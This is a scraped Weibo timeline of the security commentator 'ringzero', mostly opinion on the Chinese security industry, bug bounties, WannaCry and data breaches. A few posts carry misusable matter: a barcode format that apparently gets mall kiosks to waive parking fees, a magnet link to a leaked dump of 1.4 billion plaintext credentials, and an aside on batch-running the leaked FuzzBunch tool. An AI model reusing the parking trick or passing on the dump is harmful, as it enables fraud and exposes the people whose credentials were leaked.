ringzero
关注1049
粉丝45204

前进,前进,不择手段的野蛮前进。 --《三体》

ringzero

昨天 11:00 来自 微博 weibo.com

考一个人对XSS的理解,聊 DOM Events,聊 window / document 对象的细节属性方法,90%的白帽子搞都在划水嘛网页链接
@ringzero: 为什么国内搞攻防,扎堆在WEB安全、渗透测试这两块的人最多?因为这两块是最容易的,只需要XSS弹个框,就能说自己是做WEB安全的,SQL注入输入一个单引号,跑跑sqlmap、就能对外说自己是做渗透测试的。 ​​​

23

13

26

他关注了155个互联网博主
查看

ringzero

03-06 来自 微博 weibo.com

对于一个技术社区或技术群体而言,它一定是基于某些特定主题或技术内容而存在的,而成员间的交流和互动往往也会围绕着这个主题而展开。一个好的主题要么可以带来某种特别的感觉(比如有趣和共鸣),要么可以带来明确的价值认知,即让用户知道他在这里可以得到什么和应该怎么参与。 ​​​

4

5

16

ringzero

03-06 来自 微博 HTML5 版

补充今天又一大佬被坑:请问群里有了解paypal的吗?我昨天在localbitcoins上卖掉比特币,用paypal收的款,骗子买家后来申诉,paypal直接把...
@ringzero: 黑客大佬沃兹尼亚克曾被「时间差攻击」骗走7枚比特币,有人在网上通过信用卡支付从沃兹尼亚克手中买下了7枚比特币,然后取消了信用卡付款,就这么简单!由于用的是被盗的信用卡,所以比特币最终没法找回来。 ​​​

7

6

10

ringzero

03-04 来自 微博 weibo.com

无法理解有些人写内容,标题以【-】括号开头,一小块空白在行首破坏美感。 ​​​

1

6

7

ringzero

02-28 来自 微博 weibo.com

沃尔特·李普曼曾对媒体的功能进行过精准的定义,在他看来,一个合格的媒体首先要在第一时间告诉它的读者发生了什么,同时再告诉他们,正在发生的新闻意味着什么。安全事件的运营和新闻类似,核心能力有两个:一是速度,二是态度。如果做不到速度,至少态度上得拿出自己的见解和思考分析吧。 ​​​

5

3

15

ringzero

02-27 来自 微博 weibo.com

黑客大佬沃兹尼亚克曾被「时间差攻击」骗走7枚比特币,有人在网上通过信用卡支付从沃兹尼亚克手中买下了7枚比特币,然后取消了信用卡付款,就这么简单!由于用的是被盗的信用卡,所以比特币最终没法找回来。 ​​​

17

15

18

ringzero

02-13 来自 微博 weibo.com

法国统治越南时鼠患肆虐,政府就动员越南民众抓老鼠,上交老鼠尾巴领赏。没过多久发现到处都是没有尾巴的老鼠,越南人抓到老鼠后只把尾巴割了,老鼠放走。于是政府调整策略,要求上交整只老鼠才能领赏,每天领赏的鼠尸越来越多...因为有人专门开老鼠养殖场,把它当作一门生意来做。「结果导向のKPI」 ​​​

28

8

40

ringzero

01-20 来自 微博 weibo.com

收到72000个漏洞,支付2350万美金,其中XSS和SQL注入就占52% [摊手]
@ringzero: HackerOne发布2018年报告,16.6万注册黑客,30%的黑客使用BURP SUITE来挖洞,不知有多少人使用的破解版。网页链接 ​​​

25

7

23

ringzero

01-20 来自 微博 weibo.com

HackerOne发布2018年报告,16.6万注册黑客,30%的黑客使用BURP SUITE来挖洞,不知有多少人使用的破解版。网页链接 ​​​

53

8

22

ringzero

01-20 来自 微博 weibo.com

为什么国内搞攻防,扎堆在WEB安全、渗透测试这两块的人最多?因为这两块是最容易的,只需要XSS弹个框,就能说自己是做WEB安全的,SQL注入输入一个单引号,跑跑sqlmap、就能对外说自己是做渗透测试的。 ​​​

129

46

106

ringzero

01-20 来自 微博 weibo.com

有一句古话叫,“升米恩,斗米仇”,指如果你在物质经济匮乏的时期,因为热心的白帽子上报一个漏洞给予他们小小的奖励,他们会感激你。可如果给的奖励太多,会让整个群体形成理所应当的感觉,一旦停止奖励,你们的关系就不再牢固了。 ​​​

16

7

41

ringzero

01-18 来自 微博 HTML5 版

1024域名不是t66y?难道我注册的是假网站?那个假的t66y还支持https访问呢。号称能黑掉1024的人不少,今天总算见识到了。
@360安全卫士: 【还敢上cao榴?这回面红耳赤的将是你电脑!】著名国民福利网站“cao榴社区”近年来打得都是游击战,近期,360安全卫士发现其临时域名被植入恶意挖矿脚本,访问该社区任意页面,挖矿程序自动运行,电脑变慢、发热,CPU及内存被大量占用,严重影响电脑使用。如今,近60%网页挖矿木马源自色情网站,温馨 ​​​...全文

284

24

20

ringzero

01-17 来自 微博 weibo.com

以前用于技术交流的邮件组,就是最原始的区块链技术雏形,内容产出后即刻分发到所有客户端,抗删除、篡改、河蟹。 ​​​

5

6

23

ringzero

01-15 来自 微博 weibo.com

国内的SRC集体陷入一种叫「圈子关系」的中国特色怪圈,这个圈子不是由“白帽子”抱团形成,而是一小撮以甲方为首的群体,定期举办会议相互吹捧形成。时间一长,逐渐升级成捧场联盟,今天你家有活动,我来捧场,明天轮到我家活动,也希望你能来。一有会议邀请函刷屏,逢年过节互送小礼物。 ​​​

129

79

167

ringzero

01-15 来自 微博 weibo.com

「安全社区」在金融机构眼中,位列安全威胁の榜首。 ​​​

85

34

30

ringzero

01-13 来自 微博 weibo.com

上 v2ex 之后,我买了 MacBook Pro、Filco 机械键盘、LG 5K 显示器、Bose耳机、电动牙刷。 ​​​

9

34

51

ringzero

01-10 来自 微博 weibo.com

经过乌云洗礼之后,才越来越明白什么是质量低劣。2017年喧嚣总结:重复地说全国人民都已经知道的事。一撮人不假思索地贩卖别人的观点。安全营销的尺度被彻底的颠覆。
@瘦蛟舞: 国外一个漏洞一个站,国内一个漏洞几个会。外面的喧嚣带给你几分的知识增长了? ​​​

16

8

40

ringzero

01-10 来自 微博 weibo.com

4

3

9

ringzero

2017-12-31 来自 微博 weibo.com

大部分好的白帽子并不是为了钱或名望,而是因为纯粹的乐趣啊。-- 猪瓦兹 ​​​

5

11

44

ringzero

2017-12-23 来自 微博 weibo.com

挖矿的、勒索的、DDOS的已经成为推动安全的第一生产力。
@ringzero: WebLogic XMLDecoder 漏洞 の 事后分析猛如虎,等到大面积挖矿才后知后觉。 ​​​​

6

3

20

ringzero

2017-12-23 来自 微博 weibo.com

WebLogic XMLDecoder 漏洞 の 事后分析猛如虎,等到大面积挖矿才后知后觉。 ​​​​

10

4

13

ringzero

2017-12-20 来自 微博 weibo.com

互联网上开放 HttpFileServer (HFS) 服务的机器,60%以上是黑产的。 ​​​

19

16

29

ringzero

2017-12-20 来自 微博 weibo.com

TensorFlow 1.4 Billion Text Credentials Analysis (NLP) 网页链接
@ringzero: 暗网14亿明文磁力链接 magnet:?xt=urn:btih:7FFBCD8CEE06ABA2CE6561688CF68CE2ADDCA0A3 ​​​

44

2

22

ringzero

2017-12-20 来自 微博 weibo.com

暗网14亿明文磁力链接 magnet:?xt=urn:btih:7FFBCD8CEE06ABA2CE6561688CF68CE2ADDCA0A3 ​​​

163

70

65

ringzero

2017-12-17 来自 微博 weibo.com

不解决bug,解决报bug的人。
该微博因被多人举报,根据《微博社区管理规定》,已被删除。查看帮助:http://t.cn/Rfd14WY

120

13

20

ringzero

2017-12-16 来自 微博 weibo.com

经济发展带来的阶层失调,导致现在的85后、90后必须非常上进,才能取得生存空间。在上一波房价上涨浪潮中掉队的60后、70后、80后,往后的生存环境只会更加惨烈。
@ringzero: 堕落的底层人员是社会健康发展所必需的重要组成部分,如果所有人都上进,那就会变成每个人都非要付出巨大的努力才能活下来。 ​​​

26

5

32

ringzero

2017-12-16 来自 微博 weibo.com

最缺的是时间啊 ​​​
长图

69

12

56

ringzero

2017-12-08 来自 微博 weibo.com

发现Oracle不明细节内存溢出漏洞,需要升级到最版本!
Linux Kernel存在不明细节越界读取,可导致系统拒绝服务,升级内核到最新版!
Bind不明逻辑处理不当,会遇到断言错误,导致拒绝服务,升级内核到最新版!
VIM编辑器打开攻击者的不明文件时,可执行任意命令,升级到最新版!
NSS<*版本存在不明内存 ​​​...全文

11

7

12

ringzero

2017-12-07 来自 微博 weibo.com

每天都会被来自「时间」和「阶层」的剥削给痛醒。人口老龄化越来越重,退休阶层的人增多,50后、60后的养老金主力贡献自我们80后这代,他们后面的70后享受了经济腾飞带来的各种红利。85后顶着高房价、高物价、高税收,在泡沫中苟延残喘。 ​​​

19

12

26

ringzero

2017-12-06 来自 微博 weibo.com

黑客很无奈,无地自容。//@神棍敌人姐: 其中内鬼占据90%[允悲][允悲][允悲]
@财经网: 【新华社调查个人信息倒卖:内鬼监守自盗和黑客攻击是主要渠道】目前电信网络诈骗案件90%以上是违法分子靠掌握公民详细信息进行的精准诈骗,从已破获案件看"内鬼"监守自盗和黑客攻击仍是公民个人信息泄露的主要渠道。有犯罪分子专门收集老人信息设置骗局"鲜活信息"单条能卖数十元。 ​​​...全文

11

3

5

ringzero

2017-12-04 来自 微博 weibo.com

IOT安全现在的生态看起来比较混乱,群雄割据,各家有各家的搞法(洞)。
@小米安全中心: 发布了头条文章:小米IoT安全峰会-陈洋《小米IoT安全之路》本周每天都会放出一个峰会议题分享,记得保持关注喔~文末有议题PPT下载链接[doge] 小米IoT安全峰会-陈洋《小米IoT安全之路》 ​​​
小米安全中心

小米IoT安全峰会-陈洋《小米IoT安全之路》

1

评论

8

ringzero

2017-12-04 来自 微博 weibo.com

数据结构为整形的微信群号和微信号,等于坐实了微信聊天记录被监控啊。
该微博因被多人举报,根据《微博社区管理规定》,已被删除。查看帮助:http://t.cn/Rfd14WY

11

3

3

ringzero

2017-11-28 来自 微博 weibo.com

《吃蟒蛇从入门到精通》
@tombkeeper: 一桌菜,十几盘,有荤有素,有凉有热,怎么吃呢?你可以找一盘看起来好吃的,也可以找一盘离自己近的,都行。但是,得动筷子。不管怎么吃,最重要的是得动筷子。学技术也是一样。

有的人死活不动筷子,还不断念叨:“我要开始吃了。我马上就要开始吃了。我只要开始吃就能吃饱。我吃饱了就不饿了。你能 ​​​...全文

7

1

6

ringzero

2017-11-27 来自 微博 weibo.com

比特币持有者排行榜,第二位、第三位、第四位全是Metasploit这家公司的人,按当前汇率,人均持有价值256亿人民币。 Dustin D. Trammell曾是 2007年-2009年 Metasploit的核心开发者。 ​​​​

38

27

24

ringzero

2017-11-25 来自 微博 weibo.com

王尼玛说:正义有时会迟到,但永远不会缺席。但在我们学校,迟到三次就算一次缺席,再这样沉默下去,恐怕正义差不多要被开除了。 ​​​

305

42

393

ringzero

2017-11-25 来自 微博 weibo.com

18

2

11

ringzero

2017-11-25 来自 微博 weibo.com

需要他们的时候叫他们「无产阶级」,不需要他们的时候叫他们「低端人口」。 ​​​

69

24

164

ringzero

2017-11-22 来自 微博 HTML5 版

国内你们觉得哪家公司的CSO应该被开除?Uber 一年前被入侵,入侵者窃取了 5700 万司机和乘客的信息;Uber 并未按法律向政府汇报,而是向入侵者支付了 10 万美元以换取事情不被公开。CSO被开除。 ​​​

14

13

23

ringzero

2017-11-21 来自 微博 weibo.com

据说封禁6666端口,跟国内几大电信运营商默认封139、445端口,一个理。
@ringzero: Mac下,各大浏览器厂家对于 6666 这个端口运行的HTTP服务,都主动拒绝发起请求。www.baidu.com:6666 ​​​

6

6

11

ringzero

2017-11-21 来自 微博 weibo.com

Mac下,各大浏览器厂家对于 6666 这个端口运行的HTTP服务,都主动拒绝发起请求。www.baidu.com:6666 ​​​

9

6

12

ringzero

2017-11-21 来自 微博 weibo.com

360在A股的总股本67.6亿,这周继续涨停的话,市值直逼2249亿。再涨下去,直逼A股所有信息安全股的市值总和。 ​​​

4

17

17

ringzero

2017-11-20 来自 微博 weibo.com

不可否认,搞安全的人很多做法是偷懒的、错误的。 ​​​
长图

67

10

28

ringzero

2017-11-20 来自 微博 weibo.com

转发微博
@胡晓明_孙权: 今天阿里云计算七位开发工程师迈乐、承宗、清眸、华剑、亮伟、周皓、大邪在千岛湖路遇车祸,前车车祸掉到千岛湖中,同事们非常勇敢,下水救上来4个人还有个是孕妇,救上来一会车就沉湖了,挽救了5条生命,为这样的同事感到骄傲!满满正能量!英雄就在身边! 胡晓明_孙权的秒拍视频 ​​​

2

评论

14

ringzero

2017-11-14 来自 微博 HTML5 版

军器三十有六,而弓为称首;武艺一十有八,而弓为第一。
@ringzero: 为了解决函数和类的命名问题,把星际2的单位名,暗黑3的装备名,差不多都用上了。风之力 ​​​

4

5

7

ringzero

2017-11-12 来自 微博 weibo.com

为了解决函数和类的命名问题,把星际2的单位名,暗黑3的装备名,差不多都用上了。风之力 ​​​

7

9

20

ringzero

2017-11-08 来自 微博 weibo.com

有竞争才有活力和动力。//@响马: 完全同意。管制和垄断从来没有好结果。//@Fenng:这是一个符合逻辑的逻辑。
@聂日明: 朱恒鹏教授讲过一个逻辑,莆田系医院是医疗过度管制的结果。因为严格的管制,能拿到批文的,一定是有人脉资源或会钻空子的,大概率是没能力的。所以长庚在大陆建医院很困难。上海的幼儿早教日托也是这样,严格管制的结果并不会导致服务质量的提高,只会让和政府有关系的人可以办学,他们往往是最差的。 ​​​

30

2

12

ringzero

2017-11-03 来自 微博 weibo.com

中概股借壳成功了,泰康人寿成最大黑客。
@ringzero: 中概回A股借壳,被黑客入侵窃听,得知内幕后带着穷苦兄弟们劫了BAT大佬们的胡,触动了大佬的利益,大佬不惜重金派出杀手追杀,黑客亡命天涯の苟富贵勿相忘的故事。 ​​​

5

2

10

ringzero

2017-11-01 来自 微博 weibo.com

威胁情报的价值,在于有专业的威胁团队进行了深度分析之后,并做出判断,输出出来的结果。 ​​​

4

5

15

ringzero

2017-10-25 来自 微博 weibo.com

Garnter说:到2020年前,10%的渗透测试会基于机器学习的智能机器完成,2016年这个数字还是0%。 ​​​

21

10

24

ringzero

2017-10-21 来自 微博 weibo.com

在高度不确定的环境中,我们能做的往往是把可确定的东西掌控到极致,系统安全、网络安全、WEB安全选其一,先做到中国第一。 ​​​​

3

5

57

ringzero

2017-10-04 来自 微博 weibo.com

Yahoo雅虎「再次」宣布,Yahoo 所有用户个人信息(30亿),已全部被泄露。 ​​​​

169

39

52

ringzero

2017-09-19 来自 微博 HTML5 版

现在chromeless, puppeteer已经支持在AWS的Lambda运行用例,稍不注意就落伍了。
@ringzero: PhantomJS 是提供API支持的,开个集群前面顶个负债均衡SLB,天生微服务。这玩意才是真正打造WEB 2.0 Crawler的关键,AJAX,XHR,JSONP,FORM 通通爬出来。 ​​​​

14

3

20

ringzero

2017-09-19 来自 微博 weibo.com

PhantomJS 是提供API支持的,开个集群前面顶个负债均衡SLB,天生微服务。这玩意才是真正打造WEB 2.0 Crawler的关键,AJAX,XHR,JSONP,FORM 通通爬出来。 ​​​​

18

7

16

ringzero

2017-09-08 来自 微博 weibo.com

歪,幺幺零么,这里有个人。。。//@tombkeeper: 猜猜中国有无类似级别的泄漏?再猜猜哪年就发生了?
@Erlang: 美国信用评级公司 Equifax 被黑,泄漏了 1.43 亿用户数据。。 ​​​

18

3

6

ringzero

2017-09-07 来自 微博 weibo.com

Python代码整洁之道的第一步,干掉中文注释。 ​​​

2

8

29

ringzero

2017-08-20 来自 微博 weibo.com

下一代的学习机。 ​​​

14

16

25

ringzero

2017-08-19 来自 微博 weibo.com

夏天周末,开着空调睡过头的你。 ​​​

1

5

21

ringzero

2017-07-31 来自 微博 weibo.com

国情需要角斗士,不需要侠客。//@Monyer: 感觉这些使得安全被娱乐化了,当年叱咤江湖的大侠现在成为了角斗场上的斗士。侠客和斗士有什么区别?放在角斗场上,侠客可能会死,离开角斗场,角斗士会死。当年技术为王那种精神现在则被各种奖项所取代。侠客是孤傲的,斗士是圈养的,恐怕这才是要深思的吧!
@yuange1975: 国内PR都被老外利用了,Pwn2own和MSRC top100等等,还有真正价值的方向都被误导了。

什么是黑客?黑客有几种层面,第一种是挑战、突破、控制,控制真正的网路,我还是最喜欢这种最真实的最原力的黑客,真如黑客帝国里表达的一样,通过一根电话线就可以在网络里自由穿梭,有幸真实体验了这种黑客体验。 ​​​...全文

7

3

10

ringzero

2017-07-23 来自 微博 weibo.com

室外气温41°C,开着空调25°C在午睡的你。 ​​​

1

8

44

ringzero

2017-07-15 来自 微博 weibo.com

红蓝攻防对抗,背后拼的是知识和信息的不对称:不了解攻方的攻击手法,你就不知道应该在哪里设传感器,收集哪些日志。不了解防方的防御手段,就可能随时掉进传感器的监控范围。网页链接 ​​​

21

4

26

ringzero

2017-07-02 来自 微博 weibo.com

WIFI万能钥匙 v4.1.3,无需ROOT就可以复制WIFI明文密码。 ​​​

14

10

25

ringzero

2017-06-28 来自 微博 weibo.com

说一说为什么这次Petya对乌克兰影响最严重,黑客先攻击乌克兰的会计软件厂商M.E.Doc,然后通过M.E.Doc的更新服务器,把病毒推送给用户。用户更新软件时,直接中毒。 ​​​

23

10

19

ringzero

2017-06-27 来自 微博 weibo.com

泱泱大国,安全技术的圈儿,遍地的广告、扯淡和原文翻译。看着你们几乎每天都这样,我就放心的干活儿去了。 ​​​

21

16

52

ringzero

2017-06-26 来自 微博 weibo.com

概念喊得再响,风险覆盖面再广,幻灯片做得再炫,最后是解决不了问题的。只有回归到技术的本质根源下功夫,才能做到游刃有余。 ​​​

13

6

45

ringzero

2017-06-24 来自 微博 weibo.com

尴尬,32T的Win10源码就算有下载地址,你的本地存储也未必装得下啊。 ​​​

11

20

25

ringzero

2017-06-24 来自 微博 weibo.com

Google安全不但架构设计得好,规则制定得好,流程规定得好,而且这么支持社区帮忙挖洞。大方向是对的,值得学习。
@tombkeeper: “Whatever Google’s bug bounty rewards are, the Chinese government will pay more for it,” says Bruce Schneier, a well-known security guru and executive at IBM. ​​​

2

2

14

ringzero

2017-06-18 来自 微博 weibo.com

抑制股价泡沫最有效的手段是去杆杠,你看两年前A股去杆杠后,现在是什么状况?其实房价也一样,只要把杠杆「房贷」稍微控制一下,泡沫立马稳住。 ​​​

转发

11

9

ringzero

2017-05-21 来自 微博 weibo.com

下午花了一个小时学习Vue.js,前端用这个真不赖。网页链接 ​​​

11

10

23

ringzero

2017-05-21 来自 微博 weibo.com

以前64核256G内存跑一个计算任务需要200天,云计算兴起后,在同样的成本下,购买200台机器,直接将计算周期降低到一天。[二哈] ​​​

10

12

36

ringzero

2017-05-19 来自 微博 weibo.com

从内存下手,需要在感染以后没有重启过机器,还需要一点点运气。工具地址:网页链接 //@响马: 用 XP 的人有福了哈哈哈哈
@Libre盖子: 哈哈哈哈哈哈哈哈哈,最不安全的 Windows XP 这下立功了……有研究者忽然想起来没打补丁的 Windows XP 的随机数生成器不是密码学安全的,于是就顺手试了试用这个漏洞解密 WannaCryptor,结果貌似很成功的样子。可以计算出 AES 密钥……NSA:我让微软藏得后门终于用上了! ​​​

363

1

15

ringzero

2017-05-15 来自 微博 weibo.com

启明星辰、卫士通、绿盟科技,安全股通通涨停。现在问题来了,这几位大哥毫无作为好,却却却,无法理解。。。 ​​​

49

42

35

ringzero

2017-05-14 来自 微博 weibo.com

以彼之矛,破彼之矛,这在兵法中可是上上招啊。
@ringzero: 既然是蠕虫,为什么没有白帽子站出来,利用「永恒之蓝」定制一个关闭目标机器445端口,停掉SMB服务的治愈系蠕虫?用漏洞来帮受害者修复漏洞。 ​​​

20

16

20

ringzero

2017-05-14 来自 微博 weibo.com

既然是蠕虫,为什么没有白帽子站出来,利用「永恒之蓝」定制一个关闭目标机器445端口,停掉SMB服务的治愈系蠕虫?用漏洞来帮受害者修复漏洞。 ​​​

38

45

17

ringzero

2017-05-13 来自 微博 weibo.com

没有方程式组织,就没有这次的勒索病毒。没有乌云,企业就不会有漏洞。这次输就输在了,没有把方程式抓起来。
@ringzero: 没有人为万恶的美帝,NSA的方程式组织「Equation Group」做一个完美的总结吗?今天的「果」,完全是因为他们这个「因」造成的。 ​​​

121

17

33

ringzero

2017-05-13 来自 微博 weibo.com

没有人为万恶的美帝,NSA的方程式组织「Equation Group」做一个完美的总结吗?今天的「果」,完全是因为他们这个「因」造成的。 ​​​

133

17

16

ringzero

2017-05-13 来自 微博 weibo.com

2017年04月14日 - 2017年5月13日,事后诸葛亮,马后炮的周期刚好一个月。 ​​​

6

5

25

ringzero

2017-05-07 来自 微博 weibo.com

每次写周报、月报这种东西,苦心积虑的感觉就像考试写作文一样。 ​​​

7

12

24

ringzero

2017-05-06 来自 微博 weibo.com

Google/Github/Docker/PYPI,开发人员的几大法宝,看一家公司对码农有没有温度,得依靠他们使用这几样法宝的便利程度来评估。我司的办公网络对这些法宝全做了加速,只可惜回到家后,相当的不舒服。 ​​​

10

12

27

ringzero

2017-04-28 来自 微博 weibo.com

跟食物一起喝进肚子的咖啡,起到的提神效果,明显低于饭后单独饮用。这不早上刚吃了一碗葱油拌面加两个煎蛋,再喝了一大杯拿铁,已经过去半个小时了,提神效果还没发挥出来。 ​​​

转发

12

10

ringzero

2017-04-23 来自 微博 weibo.com

11

3

11

ringzero

2017-04-18 来自 微博 weibo.com

敏感信息泄露
@龙华开心他爸: 转发:我今天无意间看到一个阿里P9的人的去年工资单,税前182,个税52,税后130,这只是甜点。他有5万5千股阿里巴巴股票,市值600万美元;还有5万股蚂蚁金服的股票,市值应远超600万美元。这年头,没点股权激励纯靠工资也都是屌丝。。。

点评:股票不动的话,后海的三房也很难买的起! ​​​

14

2

5

ringzero

2017-04-18 来自 微博 weibo.com

python fb.py < args.txt 就可以实现批量了,为何到现在都没看到大规模的扫描? ​​​

8

6

20

ringzero

2017-04-18 来自 手机微博触屏版

终于在星巴克体验了一把做黑客的感觉。 ​​​
长图

10

19

28

ringzero

2017-04-16 来自 微博 weibo.com

Eternalblue针对Windows 2003 R2 X64的利用,折腾了一天都没成功,看着外面说影响Win2k3,心都凉了,能力有限啊啊啊。 ​​​

8

23

19

ringzero

2017-04-15 来自 微博 weibo.com

又要拔网线了,又要关机了。
@ringzero: 有的时候,面对攻击,你根本不需要出手,只要退一步(关服务),就能绝处逢生了。--Juniper ScreenOS ​​​

12

5

19

ringzero

2017-04-13 来自 微博 weibo.com

控制扫地机器人,在没有用户允许的情况下给用户扫地。
@英式没品笑话百科: 一个田螺姑娘 ​​​

39

4

13

ringzero

2017-04-13 来自 微博 weibo.com

又一个人工智能概念界的热词「浸没液冷」。 ​​​

2

3

5

ringzero

2017-04-10 来自 微博 weibo.com

将来的政府,会不会因为一家工厂里都是机器人在流水线作业,而向企业征收「机器人头税,人工智能税」?而且每家工厂要是想上新的机器人,都得抽签。看企业纳税总额的多少,给予机器优先上线资格。 ​​​

25

16

23

ringzero

2017-04-10 来自 微博 weibo.com

绿盟一季度亏损约5000万,卫士通和绿盟营收惨淡,启明星辰业绩也没有亮点,更是傍上地产生意,在成都盖起了大厦,将上海研发楼对外出租。兜里揣着最大的「政策红利」都不能实现盈利,云计算的风已经刮起,传统安全产商危矣。 ​​​

28

17

39

ringzero

2017-04-09 来自 微博 weibo.com

杭州运营商(移动/电信/联通)的网络劫持太嚣张了,不用HTTPS,根本不敢上微博,分分钟被强制关注十几个搞广告推送的黑产微博,这些黑产微博,都是精确控制到21万粉丝就不再加粉了。@Rowland-小可爱 @格格是个温暖控 ​​​​

26

32

26

ringzero

2017-04-08 来自 微博 weibo.com

看易中天品三国,善战者无一不是「洞悉人性、洞察人心」的高手。看古代战争如何收集情报之后,觉得现阶段看到的安全攻防,就像过家家的小儿科。真正战争级别的APT,依靠那些搞概念的人,恐怕是防不住的。 ​​​

11

12

33

ringzero

2017-03-28 来自 微博 weibo.com

上周的演讲PPT《我的白帽学习路线》 网页链接 ​​​

150

28

96

ringzero

2017-03-24 来自 微博 weibo.com

一个好的技术社区,会有一群大牛向我们展示更大的世界,激励我们发奋学习,扫平工作中的悲观情绪,树立远大志向。 ​​​

11

15

88

ringzero

2017-03-15 来自 微博 weibo.com

尴尬,上315晚会了。
@ringzero: 发个预测,在不久的将来,扫脸登录验证和视网膜安全验证兴起以后,那些喜欢在社交网络晒生活照的人会被黑得很惨。 ​​​

39

13

38

ringzero

2017-03-15 来自 微博 weibo.com

。。。尴尬了。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV

4

5

15

ringzero

2017-03-11 来自 微博 weibo.com

年轻人,渴望力量吗? ​​​

31

27

56

ringzero

2017-03-11 来自 微博 weibo.com

重大数据泄露的唯一益处,是它为我们提供了用来预防同类事件再次发生的有用信息。行业给了各大互联网公司一次又一次的「预警」,然而,他们却从不当回事,还给你各种冷嘲热讽。等信息泄露的长远影响开始显露时,50亿用户中的你我一定是最惨的。 ​​​

7

7

25

ringzero

2017-03-06 来自 微博 weibo.com

定制了一个Mac下的机械键盘。网页链接 ​​​

16

19

36

ringzero

2017-03-04 来自 微博 weibo.com

看企鹅的CTF介绍,估计有不少CTO心里莫名的慌张了起来,这要是支持自己公司的员工去参加比赛,不就变成给别人家的公司输送人才了嘛? ​​​

3

3

22

ringzero

2017-03-04 来自 微博 weibo.com

每次买西瓜都要装模作样地敲敲这个,拍拍那个。
每次买茶叶都要装模作样地闻闻这个,嚼嚼那个。
每次买番茄都要装模作样地捏捏这个,看看那个。
其实我啥也不懂,装模作样地好累啊。 ​​​

41

33

50

ringzero

2017-03-04 来自 微博 weibo.com

金融机构创造价值大多是赚的信息的钱,信息收集、信息处理、信息分析。 ​​​

6

1

8

ringzero

2017-03-02 来自 微博 weibo.com

过去几年的互联网黄金时代,计算机系的毕业生们总是踌躇满志意气风发,理想而又充满自信。然而,我们总是容易产生错觉,误把「行情好」带来的「溢价」,认为是自己「智商高」和「优秀」的产物。 ​​​
长图

62

22

83

ringzero

2017-02-28 来自 微博 weibo.com

经典网络下的ECS,默认网络真的不通。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV

3

7

6

ringzero

2017-02-27 来自 微博 weibo.com

默认隔离。//@阿里云: 【澄清】1.文章存在事实错误,阿里云经典网络内网默认不互通;2.经典网络下,用户只有在设置安全规则开放过多协议和过大CIDR网段如0.0.0.0/0的情况下才能被访问;3.新用户可优先选择阿里云VPC;4.经典网络存量服务器向VPC迁移功能正在内测;5.正确设置指南: 网页链接
@左耳朵耗子: 发布了头条文章:《科普一下公有云的网络》 科普一下公有云的网络 ​​​
左耳朵耗子

科普一下公有云的网络

3

1

3

ringzero

2017-02-26 来自 微博 weibo.com

AWS/Google/Azure已经过了业务发展阶段,他们很多苛刻的安全方法并不适合我们全盘借鉴。唯有根据自身环境和发展阶段,创造出适合自身的最佳安全实践才靠谱啊。 ​​​

转发

4

13

ringzero

2017-02-21 来自 手机微博触屏版

转发微博
@SegmentFault: 【前端高手必备技能:如何在chrome开发者工具中观察函数调用栈、作用域链与闭包】分享自 @SegmentFault,传送门:网页链接 ​​​

27

1

11

ringzero

2017-02-20 来自 微博 weibo.com

依据用户评价做信用评级的平台,如果默许邀请朋友来投票,算不算刷票?这样只会让熟谙于标题党的群体活得更加滋润,就像来自穷游和蚂蜂窝的攻略「拯救了」不少烂餐馆和酒店,大众点评/美团网增长了不少饭馆的入店率。 ​​​

3

5

10

ringzero

2017-02-19 来自 手机微博触屏版

中间件标准化接口化,感觉个性化需求无法得到满足。Docker相对更值得期待?//@Erlang:虽然 serverless 可以降低运维成本,但是发达的应该是云服务吧。。
@游戏开发极客: 这次在腾讯云学到一个非常牛逼的知识:serverless是服务器未来发展的方向,现在搞能领先三年。[二哈] 我偷着和你们说了,以后你们因此而发达了别忘了回来点个赞。 ​​​

6

2

9

ringzero

2017-02-19 来自 微博 weibo.com

Python的GIL(全局解释器锁)核心代码92年由语言创造者vanRossum编写,此后十八年没有一个人对这段至关重要的代码改动过一个字节。直到2010年,Pitrou才对GIL进行了近二十年来的第一次改进,而且还仅仅只在Python 3.x版本中使用。 ​​​

9

8

23

ringzero

2017-02-18 来自 微博 weibo.com

网页链接内的网站,还有很多练习可以学习。比如:根据姓名判断性别,根据姓名、邮箱名、昵称判断密码。
@ringzero: TensorFlow练习: 使用深度学习破解字符验证码 网页链接 ​​​

76

3

5

ringzero

2017-02-18 来自 微博 weibo.com

TensorFlow练习: 使用深度学习破解字符验证码 网页链接 ​​​

113

8

17

ringzero

2017-02-18 来自 微博 weibo.com

这周Google正式发布了TensorFlow 1.0,搞安全攻击的能够引入这套路子的话,整个防御方式都要跟着换血升级。第一个案例出来的速度太快了:利用TensorFlow搞定验证码 网页链接 ​​​

43

5

20

ringzero

2017-02-18 来自 微博 weibo.com

三天打开一次微信朋友圈,每次打开都想确认是否错过了啥重要讯息。然后......把转发过《习近平主持召开国家安全工作座谈会》这文章的人全删了,你们的「关注高度」已经到这个地步,怕是没有时间研究技术了吧。如果各位不再关注技术,那么咱们的缘分「共同语言」可能快到头了。 ​​​

20

评论

73

ringzero

2017-02-16 来自 手机微博触屏版

Node.js反序列化那个事,node-serialize的作者说这个项目在github上也就20颗Star,只有少数的个人项目引用了该库。然后当他看到国内报道:“根据CNVD秘书处初步普查结果,受该漏洞影响的网站服务器有可能超过70万台”,顿时有点尴尬。 ​​​

16

11

19

ringzero

2017-02-15 来自 手机微博触屏版

发个预测,在不久的将来,扫脸登录验证和视网膜安全验证兴起以后,那些喜欢在社交网络晒生活照的人会被黑得很惨。 ​​​

90

31

52

ringzero

2017-02-12 来自 手机微博触屏版

11+小票号+06+金额+180,用条码生成软件,生成一张图片,让自助缴费机扫一下,就能在杭州所有银泰城,减免4小时停车费。 ​​​

72

38

55

ringzero

2017-02-11 来自 手机微博触屏版

AWS的系统在设计之初,对待每个服务,每个服务中的每一层,安全都摆在考虑的第一位。从系统初始阶段,就把安全问题解决了,短期发展上看,他们是痛苦的,但从长远来看(云计算规模越来越大),这个决定绝对有远见。 ​​​

11

4

26

ringzero

2017-02-10 来自 微博 weibo.com

WEB安全对抗的未来:基于机器学习技术来动态生成web漏洞检测规则,弥补传统手工编写规则集方法的不足,为web对抗的进攻端带来新的发展和突破。技术参考:基于机器学习的web异常检测 网页链接 ​​​

109

12

29

ringzero

2017-02-09 来自 微博 weibo.com

在甲方,开发和业务人员都是安全的衣食父母,没有开发给我们写漏洞,我们早饿死了。但是这漏洞写多了,我们就要累死了。横竖都是个死,追求这之间的平衡,需要管理能力也需要技术能力。 ​​​

15

9

38

ringzero

2017-02-09 来自 微博 weibo.com

